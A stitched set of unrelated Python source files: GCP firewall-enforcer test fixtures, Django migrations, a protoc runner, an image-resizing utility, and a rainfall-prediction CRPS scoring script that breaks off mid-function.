"direction": "INGRESS"},
"test-network-allow-internal-0": {
"allowed": [{
"IPProtocol": u"icmp"
}, {
"IPProtocol": u"tcp",
"ports": [u"1-65535"]
}, {
"IPProtocol": u"udp",
"ports": [u"1-65535"]
}],
"description": (u"Allow internal traffic from a range of IP "
"addresses."),
"name":
u"test-network-allow-internal-0",
"network": (u"https://www.googleapis.com/compute/beta/projects/"
"test-project/global/networks/test-network"),
"sourceRanges": [u"10.0.0.0/8"],
"priority": 1000,
"direction": "INGRESS"},
"test-network-allow-public-0": {
"allowed": [{
"IPProtocol": u"ah"
}, {
"IPProtocol": u"esp"
}, {
"IPProtocol": u"tcp",
"ports": [u"22"]
}, {
"IPProtocol": u"udp",
"ports": [u"9999"]
}],
"description":
u"Allow public traffic from specific IP addresses.",
"name":
u"test-network-allow-public-0",
"network": (u"https://www.googleapis.com/compute/beta/projects/"
"test-project/global/networks/test-network"),
"sourceRanges": [u"127.0.0.1/32", u"127.0.0.2/32"],
"priority": 1000,
"direction": "INGRESS"},
}
RAW_DEFAULT_JSON_POLICY = """
[
{
"sourceRanges": ["0.0.0.0/0"],
"description": "Allow ICMP from anywhere",
"allowed": [
{
"IPProtocol": "icmp"
}
],
"name": "allow-icmp"
},
{
"sourceRanges": ["10.240.0.0/16"],
"description": "Allow internal traffic on the default network.",
"allowed": [
{
"IPProtocol": "udp",
"ports": ["1-65535"]
},
{
"IPProtocol": "tcp",
"ports": ["1-65535"]
},
{
"IPProtocol": "icmp"
}
],
"name": "allow-internal"
},
{
"sourceRanges": ["0.0.0.0/0"],
"description": "Allow RDP from anywhere",
"allowed": [
{
"IPProtocol": "tcp",
"ports": ["3389"]
}
],
"name": "allow-rdp"
},
{
"sourceRanges": ["0.0.0.0/0"],
"description": "Allow SSH from anywhere",
"allowed": [
{
"IPProtocol": "tcp",
"ports": ["22"]
}
],
"name": "allow-ssh"
}
]
"""
DEFAULT_FIREWALL_API_RESPONSE = {
"id":
u"projects/test-project/global/firewalls",
"items": [{
"sourceRanges": [u"0.0.0.0/0"],
"creationTimestamp":
u"2015-09-04T14:03:38.591-07:00",
"id":
u"3140311180993083845",
"kind":
u"compute#firewall",
"description":
u"Allow ICMP from anywhere",
"network": (u"https://www.googleapis.com/compute/beta/projects/"
"test-project/global/networks/test-network"),
"allowed": [{
"IPProtocol": u"icmp"
}],
"name":
u"test-network-allow-icmp"
}, {
"sourceRanges": [u"10.240.0.0/16"],
"description": (u"Allow internal traffic on the default network."),
"network": (u"https://www.googleapis.com/compute/beta/projects/"
"test-project/global/networks/test-network"),
"allowed": [{
"IPProtocol": u"udp",
"ports": [u"1-65535"]
}, {
"IPProtocol": u"tcp",
"ports": [u"1-65535"]
}, {
"IPProtocol": u"icmp"
}],
"name":
u"test-network-allow-internal"
}, {
"sourceRanges": [u"0.0.0.0/0"],
"description":
u"Allow RDP from anywhere",
"network": (u"https://www.googleapis.com/compute/beta/projects/"
"test-project/global/networks/test-network"),
"allowed": [
{
"IPProtocol": u"tcp",
"ports": [u"3389"]
},
],
"name":
u"test-network-allow-rdp"
}, {
"sourceRanges": [u"0.0.0.0/0"],
"description":
u"Allow SSH from anywhere",
"network": (u"https://www.googleapis.com/compute/beta/projects/"
"test-project/global/networks/test-network"),
"allowed": [
{
"IPProtocol": u"tcp",
"ports": [u"22"]
},
],
"name":
u"test-network-allow-ssh"
}],
"kind":
u"compute#firewallList",
"selfLink": (
u"https://www.googleapis.com/compute/beta/projects/test-project/global/"
"firewalls")
}
DEFAULT_FIREWALL_RULES = {
u"test-network-allow-icmp": {
"sourceRanges": [u"0.0.0.0/0"],
"creationTimestamp":
u"2015-09-04T14:03:38.591-07:00",
"id":
u"3140311180993083845",
"kind":
u"compute#firewall",
"description":
u"Allow ICMP from anywhere",
"network": (u"https://www.googleapis.com/compute/beta/projects/"
"test-project/global/networks/test-network"),
"allowed": [{
"IPProtocol": u"icmp"
}],
"name":
u"test-network-allow-icmp"
},
u"test-network-allow-internal": {
"sourceRanges": [u"10.240.0.0/16"],
"description": (u"Allow internal traffic on the default network."),
"network": (u"https://www.googleapis.com/compute/beta/projects/"
"test-project/global/networks/test-network"),
"allowed": [{
"IPProtocol": u"udp",
"ports": [u"1-65535"]
}, {
"IPProtocol": u"tcp",
"ports": [u"1-65535"]
}, {
"IPProtocol": u"icmp"
}],
"name":
u"test-network-allow-internal"
},
u"test-network-allow-rdp": {
"sourceRanges": [u"0.0.0.0/0"],
"description":
u"Allow RDP from anywhere",
"network": (u"https://www.googleapis.com/compute/beta/projects/"
"test-project/global/networks/test-network"),
"allowed": [
{
"IPProtocol": u"tcp",
"ports": [u"3389"]
},
],
"name":
u"test-network-allow-rdp"
},
u"test-network-allow-ssh": {
"sourceRanges": [u"0.0.0.0/0"],
"description":
u"Allow SSH from anywhere",
"network": (u"https://www.googleapis.com/compute/beta/projects/"
"test-project/global/networks/test-network"),
"allowed": [
{
"IPProtocol": u"tcp",
"ports": [u"22"]
},
],
"name":
u"test-network-allow-ssh"
}
}
SAMPLE_ENFORCER_PROJECTRESULTS_ASCIIPB = """
project_id: 'test-project'
timestamp_sec: 1234567890
batch_id: 1234567890
run_context: ENFORCER_BATCH
status: SUCCESS
gce_firewall_enforcement {
rules_before {
json: '[{"allowed": [{"IPProtocol": "icmp"}], "description": '
'"Allow ICMP from anywhere", "direction": "INGRESS", '
'"name": "test-network-allow-icmp", '
'"network": "https://www.googleapis.com/compute/beta/projects/'
'test-project/global/networks/test-network", "priority": 1000, '
'"sourceRanges": '
'["0.0.0.0/0"]}, {"allowed": [{"IPProtocol": "icmp"}, '
'{"IPProtocol": "tcp", "ports": ["1-65535"]}, {"IPProtocol": '
'"udp", "ports": ["1-65535"]}], "description": "Allow internal '
'traffic on the default network.", "direction": "INGRESS", "name": '
'"test-network-allow-internal", "network": '
'"https://www.googleapis.com/compute/beta/projects/test-project/'
'global/networks/test-network", "priority": 1000, "sourceRanges": '
'["10.240.0.0/16"]},'
' {"allowed": [{"IPProtocol": "tcp", "ports": ["3389"]}], '
'"description": "Allow RDP from anywhere", "direction": "INGRESS", '
'"name": '
'"test-network-allow-rdp", "network": '
'"https://www.googleapis.com/compute/beta/projects/test-project/'
'global/networks/test-network", "priority": 1000, "sourceRanges": '
'["0.0.0.0/0"]}, '
'{"allowed": [{"IPProtocol": "tcp", "ports": ["22"]}], '
'"description": "Allow SSH from anywhere", "direction": "INGRESS", '
'"name": '
'"test-network-allow-ssh", "network": '
'"https://www.googleapis.com/compute/beta/projects/test-project/'
'global/networks/test-network", "priority": 1000, "sourceRanges": '
'["0.0.0.0/0"]}]'
hash: "b589a2f63159e3450e07e9437fcda83c3dc3c343873bfb4c5c12f1a391ea9813"
}
rules_after {
json: '[{"allowed": [{"IPProtocol": "icmp"}, {"IPProtocol": "tcp", '
'"ports": ["1-65535"]}, {"IPProtocol": "udp", "ports": ["1-65535"]'
'}], "description": "Allow internal traffic from a range of IP '
'addresses.", "direction": "INGRESS", '
'"name": "test-network-allow-internal-0", "network": '
'"https://www.googleapis.com/compute/beta/projects/test-project/'
'global/networks/test-network", "priority": 1000, "sourceRanges": '
'["10.0.0.0/8"]}, '
'{"allowed": [{"IPProtocol": "icmp"}, {"IPProtocol": "tcp", '
'"ports": ["1-65535"]}, {"IPProtocol": "udp", "ports": ["1-65535"]'
'}], "description": "Allow communication between instances.", '
'"direction": "INGRESS", "name": "test-network-allow-internal-1", '
'"network": '
'"https://www.googleapis.com/compute/beta/projects/test-project/'
'global/networks/test-network", "priority": 1000, "sourceRanges": '
'["10.8.0.0/24"]}, '
'{"allowed": [{"IPProtocol": "ah"}, {"IPProtocol": "esp"}, '
'{"IPProtocol": "tcp", "ports": ["22"]}, {"IPProtocol": "udp", '
'"ports": ["9999"]}], "description": "Allow public traffic from '
'specific IP addresses.", "direction": "INGRESS", '
'"name": "test-network-allow-public-0", '
'"network": "https://www.googleapis.com/compute/beta/projects/'
'test-project/global/networks/test-network", "priority": 1000, '
'"sourceRanges": '
'["127.0.0.1/32", "127.0.0.2/32"]}]'
hash: "698e6912c23c5f4dee9008ce63ca1cb26da3bcd4c6bac1ab9118a744b18718ec"
}
rules_added: "test-network-allow-internal-0"
rules_added: "test-network-allow-internal-1"
rules_added: "test-network-allow-public-0"
rules_removed: "test-network-allow-icmp"
rules_removed: "test-network-allow-internal"
rules_removed: "test-network-allow-rdp"
rules_removed: "test-network-allow-ssh"
rules_modified_count: 7
all_rules_changed: true
}
"""
|
# Generated by Django 2.0.1 on 2018-07-21 14:20
from django.db import migrations
class Migration(migrations.Migration):
    """Rename Course.degress -> Course.degree (fixes the field-name typo)."""

    dependencies = [
        ('courses', '0005_auto_20180721_1604'),
    ]

    operations = [
        migrations.RenameField(
            model_name='course',
            old_name='degress',
            new_name='degree',
        ),
    ]
|
# Generated by Django 2.0.5 on 2018-05-24 01:03
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the `oyun` app: Animal, AnimalPhoto and Seviye
    (level), with cascading foreign keys Photo->Animal and Animal->Seviye."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Animal',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=50)),
                ('description', models.CharField(max_length=1000)),
                # slug is derived elsewhere, hence editable=False
                ('slug', models.CharField(editable=False, max_length=50)),
            ],
        ),
        migrations.CreateModel(
            name='AnimalPhoto',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('animal_picture', models.ImageField(upload_to='static/imgs')),
                ('animal', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='images', to='oyun.Animal')),
            ],
        ),
        migrations.CreateModel(
            name='Seviye',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=50)),
            ],
        ),
        migrations.AddField(
            model_name='animal',
            name='animal_seviye',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='seviye', to='oyun.Seviye'),
        ),
    ]
|
"""Runs protoc with the gRPC plugin to generate messages and gRPC stubs."""
from grpc_tools import protoc
protoc.main((
'',
'-I./protos',
'--python_out=./protos',
'--grpc_python_out=./protos',
'./protos/raft.proto',
))
print('foo') |
# -*- coding: utf-8 -*-
# @Author : wjn
# @File : get_value.py
# @describe: 配置文件读取
from common.read_config import ReadIni
class GetValue(object):
    """Central access point for values read from the INI config file."""
    # Read once, at import time, from the [MODEL] node; truthiness of the
    # "debug" entry toggles debug behaviour elsewhere.
    # NOTE(review): config changes require a process restart to take effect.
    is_debug = ReadIni(node='MODEL').get_value("debug")
from django.apps import AppConfig
class QuicklookConfig(AppConfig):
    """Django application configuration for the `quicklook` app."""
    name = 'quicklook'
from PIL import Image
from os import path, makedirs
from argparse import ArgumentParser
import cv2
def get_arguments():
    """Parse the CLI: input/output folders, the list file of images to
    process, the target square side, and an optional depth->jet-RGB flag."""
    parser = ArgumentParser(description='Utility to resize images while keeping aspect ratio')
    parser.add_argument("input_folder", help="From where to load the scaled images")
    parser.add_argument("files_to_scale", help="The file containing the names of the images we want to scale")
    parser.add_argument("output_folder", help="Where to scale the scaled images")
    parser.add_argument("square_side", help="Size of square side", type=int)
    parser.add_argument("--depth2rgb", help="If this flag is enabled, images will be converted to RGB with a "
                                            "jet colorization", action='store_true')
    return parser.parse_args()
def scale_image_keep_ratio(image, square_side):
    """Resize `image` so its largest side equals `square_side`, paste it
    centred on a square canvas, and fill the empty margins by stretching
    the image's border rows/columns outward.

    BUG FIX: the padding offsets used `/`, which yields floats under
    Python 3 true division; PIL requires integer sizes/offsets for
    paste()/transform().  `//` keeps the original Python 2 semantics on
    both interpreters.
    """
    largest_side = max(image.size)
    ratio = square_side / float(largest_side)
    new_image = Image.new(image.mode, (square_side, square_side))
    new_w = int(round(image.width * ratio))
    new_h = int(round(image.height * ratio))
    scaled_image = image.resize((new_w, new_h))
    if (new_w == new_h == square_side):
        return scaled_image  # exact fit, no padding needed
    # Integer margins around the centred, scaled image.
    top_h = (square_side - new_h) // 2
    bottom_h = square_side - (new_h + top_h)
    left_w = (square_side - new_w) // 2
    right_w = square_side - (new_w + left_w)
    new_image.paste(scaled_image, (left_w, top_h))
    if(new_w > new_h) and (top_h + bottom_h) > 1:  # empty vertical space
        # Stretch the first/last pixel rows to fill the top/bottom bands.
        top = scaled_image.transform((square_side, top_h), Image.EXTENT, (0, 0, new_w, 1))
        bottom = scaled_image.transform((square_side, bottom_h), Image.EXTENT, (0, new_h - 1, new_w, new_h))
        new_image.paste(top, (0, 0))
        new_image.paste(bottom, (0, top_h + new_h))
    elif (left_w + right_w) > 1:  # empty horizontal space
        # Stretch the first/last pixel columns to fill the side bands.
        left = scaled_image.transform((left_w, square_side), Image.EXTENT, (0, 0, 1, new_h))
        right = scaled_image.transform((right_w, square_side), Image.EXTENT, (new_w - 1, 0, new_w, new_h))
        new_image.paste(left, (0, 0))
        new_image.paste(right, (left_w + new_w, 0))
    return new_image
def convert_depth_image_to_jetrgb(image_path):
    """Load a raw depth image, min-max normalise it to 0..255, and
    colorise it with OpenCV's jet colormap; returns a PIL Image."""
    depth = cv2.imread(image_path, -1)  # -1: keep the original bit depth
    lo = depth.min()
    hi = depth.max()
    normalised = 255.0 * ((depth.astype('float32') - lo) / (hi - lo))
    coloured = cv2.applyColorMap(normalised.astype("uint8"), cv2.COLORMAP_JET)
    return Image.fromarray(coloured)
def scale_images(input_folder, output_folder, filenames, new_side_size, depth2rgb):
    """Scale every image listed in `filenames` to a new_side_size square.

    Each line's first whitespace-separated field is a path relative to
    `input_folder`.  Existing outputs are skipped so an interrupted run
    can resume.  With `depth2rgb`, raw depth images are jet-colorized
    before scaling.  Python 2 script (print statements).
    """
    total_images = len(filenames)
    print "There are " + str(total_images) + " to scale"
    if depth2rgb:
        print "Will apply colorjet"
    for item, file_line in enumerate(filenames):
        rel_path = file_line.split()[0]
        input_path = path.join(input_folder, rel_path)
        output_path = path.join(output_folder, rel_path)
        if(path.exists(output_path)):
            continue  # resume support: skip work already done
        if depth2rgb:
            image = convert_depth_image_to_jetrgb(input_path)
        else:
            image = Image.open(input_path, "r")
        new_image = scale_image_keep_ratio(image, new_side_size)
        # Mirror the input's folder structure under output_folder.
        folder_structure = path.dirname(output_path)
        if not path.exists(folder_structure):
            makedirs(folder_structure)
        new_image.save(output_path)
        if (item % 1000) == 0:
            print str(item) + " out of " + str(total_images)  # progress report
if __name__ == '__main__':
    args = get_arguments()
    # The list file stays open only while its lines are read and processed.
    with open(args.files_to_scale) as eval_file:
        scale_images(args.input_folder, args.output_folder, eval_file.readlines(), args.square_side, args.depth2rgb)
import csv
import numpy as np
import matplotlib.pyplot as plt
import math
import scipy.stats
from math import *
from scipy import interpolate
import scipy.signal
from scipy.integrate import simps
# Discretization grid: the scored CDF is evaluated at 0..69 mm of rain.
thresholds = np.arange(70)

def heaviside(actual):
    """Step-function CDF of a point mass at `actual`, over the thresholds grid."""
    return actual <= thresholds
def erfcc(x):
    """Complementary error function (Numerical Recipes rational approximation)."""
    z = abs(x)
    t = 1.0 / (1.0 + 0.5 * z)
    # Horner evaluation of the NR polynomial in t (highest degree first);
    # this is exactly the original nested form, just written as a loop.
    coefficients = (0.17087277, -0.82215223, 1.48851587, -1.13520398,
                    0.27886807, -0.18628806, 0.09678418, 0.37409196,
                    1.00002368)
    poly = 0.0
    for c in coefficients:
        poly = poly * t + c
    r = t * exp(-z * z - 1.26551223 + t * poly)
    return r if x >= 0.0 else 2.0 - r
def normcdf(x, mu, sigma):
    """CDF of Normal(mu, sigma) at x, clipped so it never exceeds 1."""
    centered = x - mu
    y = 0.5 * erfcc(-centered / (sigma * sqrt(2.0)))
    # The erfcc approximation can overshoot 1.0 slightly; clamp it.
    return min(y, 1.0)
def gauss(mean, l, v=1):
    """Gaussian CDF with the given mean and std `v`, sampled at 0..l-1."""
    return [normcdf(point, mean, v) for point in np.arange(l)]
def calc_crps(predictions, actuals):
    """Continuous Ranked Probability Score of predicted CDFs vs. observations.

    predictions: array-like of shape (n, 70), one CDF per case.
    actuals: observed rain amounts; each becomes a step-function CDF.

    FIX: the diagnostic print was a Python-2-only statement; the call form
    below works on both Python 2 and 3.
    """
    for i, v in enumerate(predictions):
        if not is_cdf_valid(v):
            # Diagnostic only: report malformed CDFs but still score them.
            print(v)
    obscdf = np.array([heaviside(actual) for actual in actuals])
    crps = np.mean(np.mean((predictions - obscdf) ** 2))
    return crps
def step(center, length=70):
    """Step CDF over `length` points: 0 below int(center), 1 from there on."""
    cutoff = int(center)
    return np.array([0.0 if i < cutoff else 1.0 for i in range(length)])
def sigmoid(center, length):
    """Logistic CDF centered at `center`, sampled at integers 0..length-1."""
    offsets = np.arange(length) - center
    return 1.0 / (1.0 + np.exp(-offsets))
def cdfs(means):
    """Build one 70-point CDF per estimated mean rain rate."""
    result = []
    for estimated_mean_rr in means:
        if estimated_mean_rr <= 0:
            # No rain: all probability mass at zero.
            result.append([1] * 70)
        elif estimated_mean_rr > 70:
            # Off the scored scale: all mass in the last bucket.
            result.append([0] * 69 + [1])
        else:
            result.append(gauss(estimated_mean_rr, 70))
    return result
def parse_floats(row, col_ind):
    """Split the space-separated CSV cell at `col_ind` into a float array."""
    cell = row[col_ind]
    return np.array(cell.split(' '), dtype='float')
def parse_rr(row, rr_ind, default=None):
    """Parse a rain-rate cell, optionally replacing out-of-range readings.

    When `default` is given (including 0), values outside [0, 1000] are
    replaced by it; otherwise the raw parsed values are returned.

    BUG FIX: the original tested `if default:`, which silently skipped the
    filtering when the caller passed default=0 (or 0.0). Test for presence
    with `is not None` instead of truthiness.
    """
    if default is not None:
        values = parse_floats(row, rr_ind)
        for i, v in enumerate(values):
            if v < 0 or v > 1000:
                values[i] = default
        return values
    return parse_floats(row, rr_ind)
def split_radars(distances, times):
    """Partition sample indices into per-radar runs.

    A new run starts whenever the distance changes or the TimeToEnd stops
    decreasing (it decreases monotonically within one radar's samples).
    Returns a list of index ranges, one per radar.
    """
    runs = []
    start = 0
    boundary = 1
    while boundary < len(distances):
        new_radar = distances[boundary] != distances[boundary - 1]
        time_reset = times[boundary] >= times[boundary - 1]
        if new_radar or time_reset:
            runs.append(range(start, boundary))
            start = boundary
        boundary += 1
    runs.append(range(start, boundary))
    return runs
def mean_without_zeros(a):
    """Mean of the nonzero entries of `a`; 0 when every entry is zero."""
    nonzero = a[a != 0]
    return nonzero.mean() if len(nonzero) else 0
def clean_radar_q(w, filler=0):
    """Replace radar-quality values outside [0, 1] with `filler`.

    BUG FIX: the original built the cleaned list but then returned the raw
    input `w`, so the cleaning had no effect. Return the cleaned values.
    """
    return [x if 0 <= x <= 1 else filler for x in w]
def hmdir(times, rr, w, x, d, ey, defaults):
    """Estimate hourly rain (mm) by integrating interpolated rain rates.

    times/rr: TimeToEnd and rain-rate samples for one radar. Only `times`
    and `rr` are used; the other parameters exist for signature
    compatibility with sibling estimators.
    """
    mask = (rr >= 0) & (rr < 100)
    valid_t = times[mask]
    valid_r = rr[mask]
    if len(valid_t) == 0:
        return 0
    if len(valid_t) < 2:
        # A single reading: assume it held for the whole hour.
        return valid_r[0] / 60.
    interp_fn = interpolate.interp1d(valid_t, valid_r)
    minute_grid = range(int(valid_t.min()), int(valid_t.max() + 1))
    per_minute = interp_fn(minute_grid)
    window = 5
    if len(per_minute) >= window:
        # Smooth sensor noise before integrating.
        per_minute = scipy.signal.savgol_filter(per_minute, window, 3)
    return sum(per_minute) / 60.
def hmdirs(times, rr, w, hts, distances, ey, defaults):
    """Estimate hourly rain (mm) by painting each reading over its minutes.

    Walks the samples from the last pair backwards, filling a per-minute
    bucket with valid rain-rate readings; hydrometeor types 6 and 8 are
    skipped as unreliable. Only times/rr/hts are used.
    """
    minute_bucket = [0.] * 61
    n = len(times)
    for i in range(1, n):
        value = rr[n - i - 1]
        hydro = hts[n - i - 1]
        usable = 0 <= value < 100 and hydro not in (6, 8)
        for minute in range(int(times[n - i]), int(times[n - i - 1])):
            if usable:
                minute_bucket[minute] = value
    return sum(minute_bucket) / 60.
def all_good_estimates(rr, distances, radar_indices, w, times, hts, ey, defaults, compos):
    """Run the hourly estimator on each radar's sample run.

    radar_indices: per-radar index ranges from split_radars.
    Returns (estimates, first_distance_per_radar), one entry per radar.

    FIX: dropped the unused locals `rain` and `q` the original computed
    on every iteration.
    """
    estimates = []
    radar_distances = []
    for radar in radar_indices:
        est = hmdir(times[radar], rr[radar], w[radar], hts[radar],
                    distances[radar], ey, defaults)
        estimates.append(est)
        radar_distances.append(distances[radar][0])
    return estimates, radar_distances
def mean(x, default=0):
    """np.mean of `x`, or `default` when `x` is empty."""
    return default if len(x) == 0 else np.mean(x)
def is_cdf_valid(case):
    """Check that `case` looks like a CDF: starts in [0, 1], never exceeds
    1 and never decreases, both within a 1e-3 tolerance.

    FIX: the original used Python-2-only `print` statements and `xrange`;
    this form behaves the same on Python 2 and 3 (the two-value diagnostic
    prints as a tuple under Python 2, which is diagnostic output only).
    """
    if case[0] < 0 or case[0] > 1:
        return False
    for i in range(1, len(case)):
        if (case[i] - 1) > 1e-3:
            print(case[i] - 1.)  # diagnostic: value exceeds 1
            return False
        if (case[i - 1] - case[i]) > 1e-3:
            print(case[i - 1], case[i])  # diagnostic: decreasing CDF
            return False
    return True
def avg_cdf(h):
    """Column-wise average of a stack of 70-point CDFs."""
    stacked = np.reshape(h, (len(h), 70))
    return np.average(stacked, axis=0)
def estimate_cdf(good):
    """Combine per-radar estimates into one 70-point CDF.

    No estimates, or an all-zero mean, yields the certain "no rain" CDF;
    otherwise the sigmoid CDFs centered at each rounded estimate are
    averaged.
    """
    if not len(good) or np.mean(good) == 0:
        return [1] * 70
    sigmoids = [sigmoid(round(estimate), 70) for estimate in good]
    return avg_cdf(sigmoids)
def radar_features(rr, hts, w, d, waters, composites):
    """Per-radar summary features for the (currently disabled) classifier.

    rr: rain-rate samples; hts: hydrometeor-type codes; w: quality index;
    composites: Composite readings (-99900 is a sentinel). `d` and `waters`
    are kept for signature compatibility but unused.

    FIX: the original also computed many rates (error/zero/oor/rain rates,
    distance, most hydrometeor-type counts) that were never returned; only
    the features actually used are computed now.
    """
    m = float(len(rr))
    # Fraction of composite readings that are negative but not the sentinel.
    composite_neg_rate = len(composites[(composites != -99900) & (composites < 0)]) / m
    oor_q = len(w[w > 1]) / m             # quality index out of range
    ok_q = len(w[(w > 0) & (w < 1)]) / m  # partial-quality readings
    ht13 = len(hts[hts == 13])
    ht6 = len(hts[hts == 6])
    ht2 = len(hts[hts == 2])
    return [composite_neg_rate, ht13 / m, np.sqrt(ok_q), oor_q, ht6 / m, ht2 / m, m, -1]
#0.00895660879826
#0.00895629729627
#0.0089555104762
#0.00894224941284
#0.00893217139966
#0.00893150685717
#0.00892673459363
#0.00892397448774
#0.00892321039254
#0.00892310908378
#0.00892309486393
def data_set(file_name):
    """Load a train/test CSV and build per-row average rain estimates.

    Returns (ids, avgs, y, cX):
      ids  -- row Ids as strings
      avgs -- (n, 3) array of mean estimates from RR1/RR2/RR3 (-1 = none)
      y    -- 'Expected' labels (empty array for unlabeled test files)
      cX   -- extra classifier features (experiment disabled; stays empty)

    FIXES: `reader.next()` and the progress print were Python-2-only;
    the input file is now closed deterministically via `with`.
    """
    with open(file_name) as csv_file:
        reader = csv.reader(csv_file)
        header = next(reader)
        id_ind = header.index('Id')
        rr1_ind = header.index('RR1')
        rr2_ind = header.index('RR2')
        rr3_ind = header.index('RR3')
        time_ind = header.index('TimeToEnd')
        rad_q_ind = header.index('RadarQualityIndex')
        try:
            expected_ind = header.index('Expected')
        except ValueError:
            # Test files carry no label column.
            expected_ind = -1
        composite_ind = header.index('Composite')
        distance_ind = header.index('DistanceToRadar')
        hydro_type_ind = header.index('HydrometeorType')
        water_ind = header.index('LogWaterVolume')
        mwm_ind = header.index('MassWeightedMean')
        y = []
        ids = []
        avgs = []
        cX = []
        for i, row in enumerate(reader):
            ids.append(row[id_ind])
            times = parse_floats(row, time_ind)
            distances = parse_floats(row, distance_ind)
            rr1 = parse_rr(row, rr1_ind)
            rr2 = parse_rr(row, rr2_ind)
            rr3 = np.fabs(parse_rr(row, rr3_ind))
            w = parse_floats(row, rad_q_ind)
            hidro_types = parse_floats(row, hydro_type_ind)
            waters = parse_floats(row, water_ind)
            mwms = parse_floats(row, mwm_ind)
            composites = parse_floats(row, composite_ind)
            if expected_ind >= 0:
                ey = float(row[expected_ind])
                y.append(ey)
            else:
                ey = -1
            radar_indices = split_radars(distances, times)
            rr1_estimates, rr1_d = all_good_estimates(rr1, distances, radar_indices, w, times, hidro_types, ey, [0.33, 33.31, 33.31], composites)
            rr2_estimates, rr2_d = all_good_estimates(rr2, distances, radar_indices, w, times, hidro_types, ey, [1.51, 36.37, 81.17], composites)
            rr3_estimates, rr3_d = all_good_estimates(rr3, distances, radar_indices, w, times, hidro_types, ey, [4.52, 38.60, 42.34], composites)
            avgs.append([mean(rr1_estimates, -1), mean(rr2_estimates, -1), mean(rr3_estimates, -1)])
            # Disabled experiment: per-radar classifier features.
            '''
            radar_f = []
            for radar in radar_indices:
                rf = radar_features(rr1[radar], hidro_types[radar], w[radar], distances[radar], waters[radar], composites[radar])
                radar_f.append(rf)
            total = np.mean(radar_f, axis=0)
            total[-1]=mean(rr1_estimates)
            cX.append(total)
            '''
            if i % 10000 == 0:
                print("Completed row %d" % i)  # progress indicator
    return ids, np.array(avgs), np.array(y), np.array(cX)
def cap_mean(a):
    """Mean of `a` with every value clipped into [0, 70]."""
    clipped = [min(max(value, 0), 70) for value in a]
    return np.mean(clipped)
def as_labels(y):
    """Binary labels: 0 where y == 0 (no rain), 1 otherwise."""
    return np.array([0 if yi == 0 else 1 for yi in y])
def split(X, y):
    """Stratified 70/30 train/validation split keyed on zero vs. nonzero rain."""
    from sklearn.cross_validation import StratifiedShuffleSplit
    labels = as_labels(y)
    splitter = StratifiedShuffleSplit(labels, 1, test_size=0.3)
    # n_iter=1, so the loop yields exactly one (train, validation) pair.
    for train_idx, val_idx in splitter:
        return (X[train_idx], y[train_idx], X[val_idx], y[val_idx],
                labels[train_idx], labels[val_idx])
#0.00904234862754
#0.00904150831178
#0.00904983861228
#0.00901613263585
#0.00900412724833
#0.00900165157547
#0.00900155415651
#0.00900142821889
#0.00899566077666
#0.00899140245563
#0.00899136162509
#0.00899121498571
#0.00898516450647
#0.00898631930177
#0.00898616252983 --
#0.00894938332555
#0.00894852729502
#0.00894846604764
#0.00894788853756
#0.00894671310461
#0.00894636668274
#0.00894535250385
#0.0089344109825
#0.00893531092568
#0.00898349408228
#0.00899329563108
#0.00896273995689
#0.00895327069295
#0.00895322370697
#0.00895317650512
#0.00893217139966
#0.00992382187229 -> 0.00971819
#0.00983595164706 -> 0.00962434
#0.00957061504447 -> 0.00924509
#0.00952959922595 -> 0.00918081
#0.0095278045182
#0.00945252983071
#0.0094347918118 -> 0.00900467
#0.00941938258085 -> 0.00893021
#0.00938841086168
#0.00923516814223
#0.00923510027563
#0.00922980704588 -> 0.00871121
#0.00922233467044
#0.0092045862579
#0.00920457357894 -> 0.00867324
#0.0092016208212
#0.00920147312222 -> 0.00867015
#0.00920130043796
#0.00919861298415
#0.00919647579626
#0.00919475970769
#0.00919475679584
#0.00916480687816 -> 0.00861711
#0.00915106704337
#0.00913163690433 -> 0.00855668
#0.00912739404781
#0.00912342542954
#0.00912337214931
#0.00912001249288 -> 0.00853307
#0.00910320309268 -> 0.00849574
#0.00907174536772 ***
#0.00907146849158 -> 0.00849297
#0.00907144426707 -> 0.00849229
#0.00910805136467 -> 0.00846733
#0.00908048569227 -> 0.00844376
#0.00907063607574
#0.00907063537653
#0.00904911201717 => 0.00842818
#0.00904491469844
#Baseline CRPS: 0.00965034244803
#1126695 training examples
#987398 0s
#133717 valid no 0
#5580 invalid
def fit_cdf(X, y):
    """Fit one empirical conditional-CDF model per feature column.

    X: (n_samples, n_features) estimate matrix; y: observed rain amounts.
    Each feature's positive values are bucketed by quantile breaks, and each
    bucket stores the empirical CDF (support 0..69 mm) of the capped labels
    that fell into it. Returns a list of (n, 70) model matrices, one per
    feature, consumed by predict_cdf.
    """
    # Cap the labels at 70 mm, the top of the scored CDF support.
    ty = []
    for yi in y:
        if yi>70:
            ty.append(70)
        else:
            ty.append(yi)
    ty = np.array(ty)
    n=70+2  # bucket count: 70 quantile bins plus the (<=0) and negative edges
    m=70    # CDF support length
    models = []
    for x in X.T:
        # Quantile break points of the clearly-positive estimates (> 0.1).
        q = scipy.stats.mstats.mquantiles(x[x>0.1], np.arange(0,n-1)/float(n-2))
        # Prepend -1 and 0 so "no estimate" (<= 0) values get their own
        # buckets; len(breaks) == n + 1, so breaks[i + 1] below is safe.
        breaks = np.concatenate(([-1, 0], q))
        model = np.zeros((n,m))
        for i in range(0, n):
            # Labels whose feature value fell into bucket i.
            d = ty[(x>breaks[i])&(x<=breaks[i+1])]
            h, _ = np.histogram(d, bins=range(0, m+1) )
            # In-place running sum turns the histogram into a CDF.
            for j in range(1, len(h)):
                h[j]+=h[j-1]
            # NOTE(review): h[-1] is 0 for an empty bucket, which divides by
            # zero here -- assumes every bucket is populated; confirm.
            model[i]=h/float(h[-1])
        models.append(model)
    return models
def predict_cdf(X, models):
    """Predict a 70-point CDF per sample from the fit_cdf bucket models.

    For each feature column, samples are re-bucketed by quantile breaks
    computed on X itself (NOTE(review): the breaks therefore differ from the
    ones used during fitting when X is a different data set -- presumably
    intentional, but verify), and the matching bucket CDF is added with
    weight 1/n_features.
    """
    n=70+2  # must match the bucket count used in fit_cdf
    m=70
    predictions = np.zeros((len(X), 70))
